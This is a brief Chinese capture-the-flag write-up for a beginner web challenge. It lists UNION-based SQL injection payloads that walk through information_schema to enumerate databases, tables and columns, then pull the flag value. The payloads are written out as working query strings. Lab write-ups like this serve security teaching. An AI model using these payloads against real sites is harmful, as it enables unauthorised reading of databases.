[第一章 web入门]SQL注入-1
payload
/index.php?id=1' and 0 union select 1,2,group_concat(fllllag) from fl4g --+
?id=-1' union select 1,2,group_concat(fllllag) from flag --+
Step
库名
?id=-1' union select 1,2,group_concat(SCHEMA_NAME) from information_schema.schemata --+
表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
字段名
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='fl4g' --+
字段值
?id=-1' union select 1,2,group_concat(fllllag) from fl4g --+
得到flag
标签:web,group,入门,union,concat,--+,SQL,id,select From: https://www.cnblogs.com/bolerat/p/18321276